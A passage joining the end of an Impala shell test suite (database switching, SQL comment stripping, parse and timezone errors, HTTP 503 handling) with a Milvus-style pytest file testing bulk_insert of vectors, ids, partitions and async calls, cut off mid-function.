self._expect_with_cmd(proc, 'use ` tpch `', vector, (), 'tpch')
proc = spawn_shell(shell_cmd + ['-d', 'functional'])
proc.expect(":{0}] functional>".format(get_impalad_port(vector)))
self._expect_with_cmd(proc, "use foo", vector, (), 'functional')
self._expect_with_cmd(proc, "use tpch", vector, (), 'tpch')
self._expect_with_cmd(proc, "use foo", vector, (), 'tpch')
proc = spawn_shell(shell_cmd + ['-d', ' functional '])
proc.expect(":{0}] functional>".format(get_impalad_port(vector)))
proc = spawn_shell(shell_cmd + ['-d', '` functional `'])
proc.expect(":{0}] functional>".format(get_impalad_port(vector)))
# Start an Impala shell with an invalid DB.
proc = spawn_shell(shell_cmd + ['-d', 'foo'])
proc.expect(":{0}] default>".format(get_impalad_port(vector)))
self._expect_with_cmd(proc, "use foo", vector, (), 'default')
self._expect_with_cmd(proc, "use functional", vector, (), 'functional')
self._expect_with_cmd(proc, "use foo", vector, (), 'functional')
proc.sendeof()
proc.wait()
def test_strip_leading_comment(self, vector):
"""Test stripping leading comments from SQL statements"""
assert ('--delete\n', 'select 1') == \
ImpalaShellClass.strip_leading_comment('--delete\nselect 1')
assert ('--delete\n', 'select --do not delete\n1') == \
ImpalaShellClass.strip_leading_comment('--delete\nselect --do not delete\n1')
assert (None, 'select --do not delete\n1') == \
ImpalaShellClass.strip_leading_comment('select --do not delete\n1')
assert ('/*delete*/\n', 'select 1') == \
ImpalaShellClass.strip_leading_comment('/*delete*/\nselect 1')
assert ('/*delete\nme*/\n', 'select 1') == \
ImpalaShellClass.strip_leading_comment('/*delete\nme*/\nselect 1')
assert ('/*delete\nme*/\n', 'select 1') == \
ImpalaShellClass.strip_leading_comment('/*delete\nme*/\nselect 1')
assert ('/*delete*/', 'select 1') == \
ImpalaShellClass.strip_leading_comment('/*delete*/select 1')
assert ('/*delete*/ ', 'select /*do not delete*/ 1') == \
ImpalaShellClass.strip_leading_comment('/*delete*/ select /*do not delete*/ 1')
assert ('/*delete1*/ \n/*delete2*/ \n--delete3 \n', 'select /*do not delete*/ 1') == \
ImpalaShellClass.strip_leading_comment('/*delete1*/ \n'
'/*delete2*/ \n'
'--delete3 \n'
'select /*do not delete*/ 1')
assert (None, 'select /*do not delete*/ 1') == \
ImpalaShellClass.strip_leading_comment('select /*do not delete*/ 1')
assert ('/*delete*/\n', 'select c1 from\n'
'a\n'
'join -- +SHUFFLE\n'
'b') == \
ImpalaShellClass.strip_leading_comment('/*delete*/\n'
'select c1 from\n'
'a\n'
'join -- +SHUFFLE\n'
'b')
assert ('/*delete*/\n', 'select c1 from\n'
'a\n'
'join /* +SHUFFLE */\n'
'b') == \
ImpalaShellClass.strip_leading_comment('/*delete*/\n'
'select c1 from\n'
'a\n'
'join /* +SHUFFLE */\n'
'b')
assert (None, 'select 1') == \
ImpalaShellClass.strip_leading_comment('select 1')
def test_malformed_query(self, vector):
"""Test the handling of malformed query without closing quotation"""
shell = ImpalaShell(vector)
query = "with v as (select 1) \nselect foo('\\\\'), ('bar \n;"
shell.send_cmd(query)
result = shell.get_result()
assert "ERROR: ParseException: Unmatched string literal" in result.stderr,\
result.stderr
def test_timezone_validation(self, vector):
"""Test that query option TIMEZONE is validated when executing a query.
Query options are not sent to the coordinator immediately, so the error checking
will only happen when running a query.
"""
p = ImpalaShell(vector)
p.send_cmd('set timezone=BLA;')
p.send_cmd('select 1;')
results = p.get_result()
assert "Fetched 1 row" not in results.stderr
# assert "ERROR: Errors parsing query options" in results.stderr, results.stderr
assert "Invalid timezone name 'BLA'" in results.stderr, results.stderr
def test_with_clause(self, vector):
# IMPALA-7939: Fix issue where CTE that contains "insert", "upsert", "update", or
# "delete" is categorized as a DML statement.
for keyword in ["insert", "upsert", "update", "delete", "\\'insert\\'",
"\\'upsert\\'", "\\'update\\'", "\\'delete\\'"]:
p = ImpalaShell(vector)
cmd = ("with foo as "
"(select * from functional.alltypestiny where string_col='%s') "
"select * from foo limit 1" % keyword)
p.send_cmd(cmd)
result = p.get_result()
assert "Fetched 0 row" in result.stderr
def test_quotes_in_with_clause(self, vector):
# IMPALA-10051: This test verifies that the fix prevents ValueErrors caused by
# shlex library when quotes and whitespace characters are mixed.
p = ImpalaShell(vector)
cmd = ("with foo as "
"(select *, regexp_replace(string_col,\"[a-zA-Z]\",\"+ \") "
"from functional.alltypestiny) "
"select * from foo limit 1")
p.send_cmd(cmd)
result = p.get_result()
assert "Fetched 1 row" in result.stderr
def test_http_interactions(self, vector, http_503_server):
"""Test interactions with the http server when using hs2-http protocol.
Check that the shell prints a good message when the server returns a 503 error."""
protocol = vector.get_value("protocol")
if protocol != 'hs2-http':
pytest.skip()
# Check that we get a message about the 503 error when we try to connect.
shell_args = ["--protocol={0}".format(protocol),
"-i{0}:{1}".format(http_503_server.HOST, http_503_server.PORT)]
shell_proc = spawn_shell([IMPALA_SHELL_EXECUTABLE] + shell_args)
shell_proc.expect("HTTP code 503", timeout=10)
def test_http_interactions_extra(self, vector, http_503_server_extra):
"""Test interactions with the http server when using hs2-http protocol.
Check that the shell prints a good message when the server returns a 503 error,
including the body text from the message."""
protocol = vector.get_value("protocol")
if protocol != 'hs2-http':
pytest.skip()
# Check that we get a message about the 503 error when we try to connect.
shell_args = ["--protocol={0}".format(protocol),
"-i{0}:{1}".format(http_503_server_extra.HOST,
http_503_server_extra.PORT)]
shell_proc = spawn_shell([IMPALA_SHELL_EXECUTABLE] + shell_args)
shell_proc.expect("HTTP code 503: Service Unavailable \[EXTRA\]", timeout=10)
def run_impala_shell_interactive(vector, input_lines, shell_args=None,
wait_until_connected=True):
"""Runs a command in the Impala shell interactively."""
# if argument "input_lines" is a string, makes it into a list
if type(input_lines) is str:
input_lines = [input_lines]
# workaround to make Popen environment 'utf-8' compatible
# since piping defaults to ascii
my_env = os.environ
my_env['PYTHONIOENCODING'] = 'utf-8'
p = ImpalaShell(vector, args=shell_args, env=my_env,
wait_until_connected=wait_until_connected)
for line in input_lines:
p.send_cmd(line)
return p.get_result()
|
test_bulk_insert.py | import pytest
from tests.utils import *
from tests.constants import *
ADD_TIMEOUT = 600
uid = "test_insert"
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
default_single_query = {
"bool": {
"must": [
{"vector": {field_name: {"topk": 10, "query": gen_vectors(1, default_dim), "metric_type": "L2",
"params": {"nprobe": 10}}}}
]
}
}
class TestInsertBase:
"""
******************************************************************
The following cases are used to test `insert` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")) == "CPU":
if request.param["index_type"] in index_cpu_not_support():
pytest.skip("CPU not support index_type: ivf_sq8h")
return request.param
@pytest.fixture(
scope="function",
params=gen_single_filter_fields()
)
def get_filter_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_single_vector_fields()
)
def get_vector_field(self, request):
yield request.param
def test_add_vector_with_empty_vector(self, connect, collection):
'''
target: test add vectors with empty vectors list
method: set empty vectors list as add method params
expected: raises a Exception
'''
vector = []
with pytest.raises(Exception) as e:
status, ids = connect.bulk_insert(collection, vector)
def test_add_vector_with_None(self, connect, collection):
'''
target: test add vectors with None
method: set None as add method params
expected: raises a Exception
'''
vector = None
with pytest.raises(Exception) as e:
status, ids = connect.bulk_insert(collection, vector)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_collection_not_existed(self, connect):
'''
target: test insert, with collection not existed
method: insert entity into a random named collection
expected: error raised
'''
collection_name = gen_unique_str(uid)
with pytest.raises(Exception) as e:
connect.bulk_insert(collection_name, default_entities)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_drop_collection(self, connect, collection):
'''
target: test delete collection after insert vector
method: insert vector and delete collection
expected: no error raised
'''
ids = connect.bulk_insert(collection, default_entity)
assert len(ids) == 1
connect.drop_collection(collection)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_sleep_drop_collection(self, connect, collection):
'''
target: test delete collection after insert vector for a while
method: insert vector, sleep, and delete collection
expected: no error raised
'''
ids = connect.bulk_insert(collection, default_entity)
assert len(ids) == 1
connect.flush([collection])
connect.drop_collection(collection)
@pytest.mark.skip("create index")
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_create_index(self, connect, collection, get_simple_index):
'''
target: test build index insert after vector
method: insert vector and build index
expected: no error raised
'''
ids = connect.bulk_insert(collection, default_entities)
assert len(ids) == default_nb
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
info = connect.describe_collection(collection)
fields = info["fields"]
for field in fields:
if field["name"] == field_name:
assert field["indexes"][0] == get_simple_index
@pytest.mark.skip("create index")
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_create_index_new(self, connect, collection, get_simple_index):
'''
target: test build index insert after vector
method: insert vector and build index
expected: no error raised
'''
ids = connect.bulk_insert(collection, default_entities_new)
assert len(ids) == default_nb
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
info = connect.describe_collection(collection)
fields = info["fields"]
for field in fields:
if field["name"] == field_name:
assert field["indexes"][0] == get_simple_index
@pytest.mark.skip("create index")
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_after_create_index(self, connect, collection, get_simple_index):
'''
target: test build index insert after vector
method: insert vector and build index
expected: no error raised
'''
connect.create_index(collection, field_name, get_simple_index)
ids = connect.bulk_insert(collection, default_entities)
assert len(ids) == default_nb
info = connect.describe_collection(collection)
fields = info["fields"]
for field in fields:
if field["name"] == field_name:
assert field["indexes"][0] == get_simple_index
# @pytest.mark.skip(" later ")
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_search(self, connect, collection):
'''
target: test search vector after insert vector after a while
method: insert vector, sleep, and search collection
expected: no error raised
'''
ids = connect.bulk_insert(collection, default_entities)
connect.flush([collection])
res = connect.search(collection, default_single_query)
logging.getLogger().debug(res)
assert res
@pytest.mark.skip("segment row count")
def test_insert_segment_row_count(self, connect, collection):
nb = default_segment_row_limit + 1
res_ids = connect.bulk_insert(collection, gen_entities(nb))
connect.flush([collection])
assert len(res_ids) == nb
stats = connect.get_collection_stats(collection)
assert len(stats['partitions'][0]['segments']) == 2
for segment in stats['partitions'][0]['segments']:
assert segment['row_count'] in [default_segment_row_limit, 1]
@pytest.fixture(
scope="function",
params=[
1,
2000
],
)
def insert_count(self, request):
yield request.param
@pytest.mark.skip(" todo support count entities")
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids(self, connect, id_collection, insert_count):
'''
target: test insert vectors in collection, use customize ids
method: create collection and insert vectors in it, check the ids returned and the collection length after vectors inserted
expected: the length of ids and the collection row count
'''
nb = insert_count
ids = [i for i in range(nb)]
res_ids = connect.bulk_insert(id_collection, gen_entities(nb), ids)
connect.flush([id_collection])
assert len(res_ids) == nb
assert res_ids == ids
res_count = connect.count_entities(id_collection)
assert res_count == nb
@pytest.mark.skip(" todo support count entities")
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_the_same_ids(self, connect, id_collection, insert_count):
'''
target: test insert vectors in collection, use customize the same ids
method: create collection and insert vectors in it, check the ids returned and the collection length after vectors inserted
expected: the length of ids and the collection row count
'''
nb = insert_count
ids = [1 for i in range(nb)]
res_ids = connect.bulk_insert(id_collection, gen_entities(nb), ids)
connect.flush([id_collection])
assert len(res_ids) == nb
assert res_ids == ids
res_count = connect.count_entities(id_collection)
assert res_count == nb
@pytest.mark.skip(" todo support count entities")
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_fields(self, connect, get_filter_field, get_vector_field):
'''
target: test create normal collection with different fields, insert entities into id with ids
method: create collection with diff fields: metric/field_type/..., insert, and count
expected: row count correct
'''
nb = 5
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = gen_unique_str("test_collection")
fields = {
"fields": [filter_field, vector_field],
"segment_row_limit": default_segment_row_limit,
"auto_id": True
}
connect.create_collection(collection_name, fields)
ids = [i for i in range(nb)]
entities = gen_entities_by_fields(fields["fields"], nb, default_dim)
res_ids = connect.bulk_insert(collection_name, entities, ids)
assert res_ids == ids
connect.flush([collection_name])
res_count = connect.count_entities(collection_name)
assert res_count == nb
# TODO: assert exception && enable
@pytest.mark.level(2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_twice_ids_no_ids(self, connect, id_collection):
'''
target: check the result of insert, with params ids and no ids
method: test insert vectors twice, use customize ids first, and then use no ids
expected: error raised
'''
ids = [i for i in range(default_nb)]
res_ids = connect.bulk_insert(id_collection, default_entities, ids)
with pytest.raises(Exception) as e:
res_ids_new = connect.bulk_insert(id_collection, default_entities)
# TODO: assert exception && enable
@pytest.mark.level(2)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_twice_not_ids_ids(self, connect, id_collection):
'''
target: check the result of insert, with params ids and no ids
method: test insert vectors twice, use not ids first, and then use customize ids
expected: error raised
'''
with pytest.raises(Exception) as e:
res_ids = connect.bulk_insert(id_collection, default_entities)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_length_not_match_batch(self, connect, id_collection):
'''
target: test insert vectors in collection, use customize ids, len(ids) != len(vectors)
method: create collection and insert vectors in it
expected: raise an exception
'''
ids = [i for i in range(1, default_nb)]
logging.getLogger().info(len(ids))
with pytest.raises(Exception) as e:
res_ids = connect.bulk_insert(id_collection, default_entities, ids)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_length_not_match_single(self, connect, collection):
'''
target: test insert vectors in collection, use customize ids, len(ids) != len(vectors)
method: create collection and insert vectors in it
expected: raise an exception
'''
ids = [i for i in range(1, default_nb)]
logging.getLogger().info(len(ids))
with pytest.raises(Exception) as e:
res_ids = connect.bulk_insert(collection, default_entity, ids)
@pytest.mark.skip(" todo support count entities")
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_ids_fields(self, connect, get_filter_field, get_vector_field):
'''
target: test create normal collection with different fields, insert entities into id without ids
method: create collection with diff fields: metric/field_type/..., insert, and count
expected: row count correct
'''
nb = 5
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = gen_unique_str("test_collection")
fields = {
"fields": [filter_field, vector_field],
"segment_row_limit": default_segment_row_limit
}
connect.create_collection(collection_name, fields)
entities = gen_entities_by_fields(fields["fields"], nb, default_dim)
res_ids = connect.bulk_insert(collection_name, entities)
connect.flush([collection_name])
res_count = connect.count_entities(collection_name)
assert res_count == nb
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_tag(self, connect, collection):
'''
target: test insert entities in collection created before
method: create collection and insert entities in it, with the partition_tag param
expected: the collection row count equals to nq
'''
connect.create_partition(collection, default_tag)
ids = connect.bulk_insert(collection, default_entities, partition_tag=default_tag)
assert len(ids) == default_nb
assert connect.has_partition(collection, default_tag)
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_tag_with_ids(self, connect, id_collection):
'''
target: test insert entities in collection created before, insert with ids
method: create collection and insert entities in it, with the partition_tag param
expected: the collection row count equals to nq
'''
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
res_ids = connect.bulk_insert(id_collection, default_entities, ids, partition_tag=default_tag)
assert res_ids == ids
@pytest.mark.skip(" todo support count entities")
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_default_tag(self, connect, collection):
'''
target: test insert entities into default partition
method: create partition and insert info collection without tag params
expected: the collection row count equals to nb
'''
connect.create_partition(collection, default_tag)
ids = connect.bulk_insert(collection, default_entities)
connect.flush([collection])
assert len(ids) == default_nb
res_count = connect.count_entities(collection)
assert res_count == default_nb
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_tag_not_existed(self, connect, collection):
'''
target: test insert entities in collection created before
method: create collection and insert entities in it, with the not existed partition_tag param
expected: error raised
'''
tag = gen_unique_str()
with pytest.raises(Exception) as e:
ids = connect.bulk_insert(collection, default_entities, partition_tag=tag)
@pytest.mark.skip(" not support count entities")
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_tag_existed(self, connect, collection):
'''
target: test insert entities in collection created before
method: create collection and insert entities in it repeatly, with the partition_tag param
expected: the collection row count equals to nq
'''
connect.create_partition(collection, default_tag)
ids = connect.bulk_insert(collection, default_entities, partition_tag=default_tag)
ids = connect.bulk_insert(collection, default_entities, partition_tag=default_tag)
connect.flush([collection])
res_count = connect.count_entities(collection)
assert res_count == 2 * default_nb
@pytest.mark.level(2)
def test_insert_without_connect(self, dis_connect, collection):
'''
target: test insert entities without connection
method: create collection and insert entities in it, check if inserted successfully
expected: raise exception
'''
with pytest.raises(Exception) as e:
ids = dis_connect.bulk_insert(collection, default_entities)
def test_insert_collection_not_existed(self, connect):
'''
target: test insert entities in collection, which not existed before
method: insert entities collection not existed, check the status
expected: error raised
'''
with pytest.raises(Exception) as e:
ids = connect.bulk_insert(gen_unique_str("not_exist_collection"), default_entities)
@pytest.mark.skip("to do add dim check ")
def test_insert_dim_not_matched(self, connect, collection):
'''
target: test insert entities, the vector dimension is not equal to the collection dimension
method: the entities dimension is half of the collection dimension, check the status
expected: error raised
'''
vectors = gen_vectors(default_nb, int(default_dim) // 2)
insert_entities = copy.deepcopy(default_entities)
insert_entities[-1]["values"] = vectors
with pytest.raises(Exception) as e:
ids = connect.bulk_insert(collection, insert_entities)
def test_insert_with_field_name_not_match(self, connect, collection):
'''
target: test insert entities, with the entity field name updated
method: update entity field name
expected: error raised
'''
tmp_entity = update_field_name(copy.deepcopy(default_entity), "int64", "int64new")
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
@pytest.mark.skip(" todo support type check")
def test_insert_with_field_type_not_match(self, connect, collection):
'''
target: test insert entities, with the entity field type updated
method: update entity field type
expected: error raised
'''
tmp_entity = update_field_type(copy.deepcopy(default_entity), "int64", DataType.FLOAT)
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
@pytest.mark.skip("to do add field_type check ")
@pytest.mark.level(2)
def test_insert_with_field_type_not_match_B(self, connect, collection):
'''
target: test insert entities, with the entity field type updated
method: update entity field type
expected: error raised
'''
tmp_entity = update_field_type(copy.deepcopy(default_entity), "int64", DataType.DOUBLE)
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
@pytest.mark.level(2)
def test_insert_with_field_value_not_match(self, connect, collection):
'''
target: test insert entities, with the entity field value updated
method: update entity field value
expected: error raised
'''
tmp_entity = update_field_value(copy.deepcopy(default_entity), DataType.FLOAT, 's')
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_field_more(self, connect, collection):
'''
target: test insert entities, with more fields than collection schema
method: add entity field
expected: error raised
'''
tmp_entity = add_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_field_vector_more(self, connect, collection):
'''
target: test insert entities, with more fields than collection schema
method: add entity vector field
expected: error raised
'''
tmp_entity = add_vector_field(default_nb, default_dim)
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_field_less(self, connect, collection):
'''
target: test insert entities, with less fields than collection schema
method: remove entity field
expected: error raised
'''
tmp_entity = remove_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_field_vector_less(self, connect, collection):
'''
target: test insert entities, with less fields than collection schema
method: remove entity vector field
expected: error raised
'''
tmp_entity = remove_vector_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_no_field_vector_value(self, connect, collection):
'''
target: test insert entities, with no vector field value
method: remove entity vector field
expected: error raised
'''
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["values"]
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_no_field_vector_type(self, connect, collection):
'''
target: test insert entities, with no vector field type
method: remove entity vector field
expected: error raised
'''
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["type"]
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
def test_insert_with_no_field_vector_name(self, connect, collection):
'''
target: test insert entities, with no vector field name
method: remove entity vector field
expected: error raised
'''
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["name"]
with pytest.raises(Exception):
connect.bulk_insert(collection, tmp_entity)
@pytest.mark.skip("support count entities")
@pytest.mark.level(2)
@pytest.mark.timeout(30)
def test_collection_insert_rows_count_multi_threading(self, args, collection):
'''
target: test collection rows_count is correct or not with multi threading
method: create collection and insert entities in it(idmap),
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
'''
if args["handler"] == "HTTP":
pytest.skip("Skip test in http mode")
thread_num = 8
threads = []
milvus = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"], try_connect=False)
def insert(thread_i):
logging.getLogger().info("In thread-%d" % thread_i)
milvus.bulk_insert(collection, default_entities)
milvus.flush([collection])
for i in range(thread_num):
t = MilvusTestThread(target=insert, args=(i,))
threads.append(t)
t.start()
for t in threads:
t.join()
res_count = milvus.count_entities(collection)
assert res_count == thread_num * default_nb
# TODO: unable to set config
@pytest.mark.skip("get entity by id")
@pytest.mark.level(2)
def _test_insert_disable_auto_flush(self, connect, collection):
'''
target: test insert entities, with disable autoflush
method: disable autoflush and insert, get entity
expected: the count is equal to 0
'''
delete_nums = 500
disable_flush(connect)
ids = connect.bulk_insert(collection, default_entities)
res = connect.get_entity_by_id(collection, ids[:delete_nums])
assert len(res) == delete_nums
assert res[0] is None
class TestInsertBinary:
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_binary_index(self, request):
request.param["metric_type"] = "JACCARD"
return request.param
@pytest.mark.skip("count entities")
def test_insert_binary_entities(self, connect, binary_collection):
'''
target: test insert entities in binary collection
method: create collection and insert binary entities in it
expected: the collection row count equals to nb
'''
ids = connect.bulk_insert(binary_collection, default_binary_entities)
assert len(ids) == default_nb
connect.flush()
assert connect.count_entities(binary_collection) == default_nb
@pytest.mark.skip("count entities")
def test_insert_binary_entities_new(self, connect, binary_collection):
'''
target: test insert entities in binary collection
method: create collection and insert binary entities in it
expected: the collection row count equals to nb
'''
ids = connect.bulk_insert(binary_collection, default_binary_entities_new)
assert len(ids) == default_nb
connect.flush()
assert connect.count_entities(binary_collection) == default_nb
# @pytest.mark.skip
def test_insert_binary_tag(self, connect, binary_collection):
'''
target: test insert entities and create partition tag
method: create collection and insert binary entities in it, with the partition_tag param
expected: the collection row count equals to nb
'''
connect.create_partition(binary_collection, default_tag)
ids = connect.bulk_insert(binary_collection, default_binary_entities, partition_tag=default_tag)
assert len(ids) == default_nb
assert connect.has_partition(binary_collection, default_tag)
@pytest.mark.skip("count entities")
@pytest.mark.level(2)
def test_insert_binary_multi_times(self, connect, binary_collection):
'''
target: test insert entities multi times and final flush
method: create collection and insert binary entity multi and final flush
expected: the collection row count equals to nb
'''
for i in range(default_nb):
ids = connect.bulk_insert(binary_collection, default_binary_entity)
assert len(ids) == 1
connect.flush([binary_collection])
assert connect.count_entities(binary_collection) == default_nb
@pytest.mark.skip("create index")
def test_insert_binary_after_create_index(self, connect, binary_collection, get_binary_index):
'''
target: test insert binary entities after build index
method: build index and insert entities
expected: no error raised
'''
connect.create_index(binary_collection, binary_field_name, get_binary_index)
ids = connect.bulk_insert(binary_collection, default_binary_entities)
assert len(ids) == default_nb
connect.flush([binary_collection])
info = connect.describe_collection(binary_collection)
fields = info["fields"]
for field in fields:
if field["name"] == binary_field_name:
assert field["indexes"][0] == get_binary_index
@pytest.mark.skip("create index")
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_binary_create_index(self, connect, binary_collection, get_binary_index):
'''
target: test build index insert after vector
method: insert vector and build index
expected: no error raised
'''
ids = connect.bulk_insert(binary_collection, default_binary_entities)
assert len(ids) == default_nb
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_binary_index)
info = connect.describe_collection(binary_collection)
fields = info["fields"]
for field in fields:
if field["name"] == binary_field_name:
assert field["indexes"][0] == get_binary_index
@pytest.mark.skip("binary search")
def test_insert_binary_search(self, connect, binary_collection):
'''
target: test search vector after insert vector after a while
method: insert vector, sleep, and search collection
expected: no error raised
'''
ids = connect.bulk_insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
query, vecs = gen_query_vectors(binary_field_name, default_binary_entities, default_top_k, 1, metric_type="JACCARD")
res = connect.search(binary_collection, query)
logging.getLogger().debug(res)
assert res
class TestInsertAsync:
@pytest.fixture(scope="function", autouse=True)
def skip_http_check(self, args):
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
@pytest.fixture(
scope="function",
params=[
1,
1000
],
)
def insert_count(self, request):
yield request.param
def check_status(self, result):
logging.getLogger().info("In callback check status")
assert not result
def check_result(self, result):
logging.getLogger().info("In callback check status")
assert result
def test_insert_async(self, connect, collection, insert_count):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
future = connect.bulk_insert(collection, gen_entities(nb), _async=True)
ids = future.result()
connect.flush([collection])
assert len(ids) == nb
@pytest.mark.level(2)
def test_insert_async_false(self, connect, collection, insert_count):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
ids = connect.bulk_insert(collection, gen_entities(nb), _async=False)
# ids = future.result()
connect.flush([collection])
assert len(ids) == nb
def test_insert_async_callback(self, connect, collection, insert_count):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
nb = insert_count
future = connect.bulk_insert(collection, gen_entities(nb), _async=True, _callback=self.check_result)
future.done()
ids = future.result()
assert len(ids) == nb
@pytest.mark.skip("count entities")
@pytest.mark.level(2)
def test_insert_async_long(self, connect, collection):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
nb = 50000
future = connect.bulk_insert(collection, gen_entities(nb), _async=True, _callback=self.check_result)
result = future.result()
assert len(result) == nb
connect.flush([collection])
count = connect.count_entities(collection)
logging.getLogger().info(count)
assert count == nb
@pytest.mark.skip("count entities")
@pytest.mark.level(2)
def test_insert_async_callback_timeout(self, connect, collection):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
nb = 100000
future = connect.bulk_insert(collection, gen_entities(nb), _async=True, _callback=self.check_status, timeout=1)
with pytest.raises(Exception) as e:
result = future.result()
count = connect.count_entities(collection)
assert count == 0
def test_insert_async_invalid_params(self, connect):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: raise exception
'''
collection_new = gen_unique_str()
with pytest.raises(Exception) as e:
future = connect.bulk_insert(collection_new, default_entities, _async=True)
result = future.result()
def test_insert_async_invalid_params_raise_exception(self, connect, collection):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: raise exception
'''
entities = []
with pytest.raises(Exception) as e:
future = connect.bulk_insert(collection, entities, _async=True)
future.result()
class TestInsertMultiCollections:
"""
******************************************************************
The following cases are used to test `insert` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
logging.getLogger().info(request.param)
if str(connect._cmd("mode")) == "CPU":
if request.param["index_type"] in index_cpu_not_support():
pytest.skip("sq8h not support in CPU mode")
return request.param
@pytest.mark.skip("count entities")
def test_insert_vector_multi_collections(self, connect):
'''
target: test insert entities
method: create 10 collections and insert entities into them in turn
expected: row count
'''
collection_num = 10
collection_list = []
for i in range(collection_num):
collection_name = gen_unique_str(uid)
collection_list.append(collection_name)
connect.create_collection(collection_name, default_fields)
ids = connect.bulk_insert(collection_name, default_entities)
connect.flush([collection_name])
assert len(ids) == default_nb
count = connect.count_entities(collection_name)
assert count == default_nb
@pytest.mark.timeout(ADD_TIMEOUT)
def test_drop_collection_insert_vector_another(self, connect, collection):
'''
target: test insert vector to collection_1 after collection_2 deleted
method: delete collection_2 and insert vector to collection_1
expected: row count equals the length of entities inserted
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.drop_collection(collection)
ids = connect.bulk_insert(collection_name, default_entity)
connect.flush([collection_name])
assert len(ids) == 1
@pytest.mark.skip("create index")
@pytest.mark.timeout(ADD_TIMEOUT)
def test_create_index_insert_vector_another(self, connect, collection, get_simple_index):
'''
target: test insert vector to collection_2 after build index for collection_1
method: build index and insert vector
expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.create_index(collection, field_name, get_simple_index)
ids = connect.bulk_insert(collection, default_entity)
connect.drop_collection(collection_name)
@pytest.mark.skip("create index")
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_vector_create_index_another(self, connect, collection, get_simple_index):
'''
target: test insert vector to collection_2 after build index for collection_1
method: build index and insert vector
expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
ids = connect.bulk_insert(collection, default_entity)
connect.create_index(collection, field_name, get_simple_index)
count = connect.count_entities(collection_name)
assert count == 0
@pytest.mark.skip("create index")
@pytest.mark.timeout(ADD_TIMEOUT)
def test_insert_vector_sleep_create_index_another(self, connect, collection, get_simple_index):
'''
target: test insert vector to collection_2 after build index for collection_1 for a while
method: build index and insert vector
expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
ids = connect.bulk_insert(collection, default_entity)
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
count = connect.count_entities(collection)
assert count == 1
@pytest.mark.skip("count entities")
@pytest.mark.timeout(ADD_TIMEOUT)
def test_search_vector_insert_vector_another(self, connect, collection):
'''
target: test insert vector to collection_1 after search collection_2
method: search collection and insert vector
expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
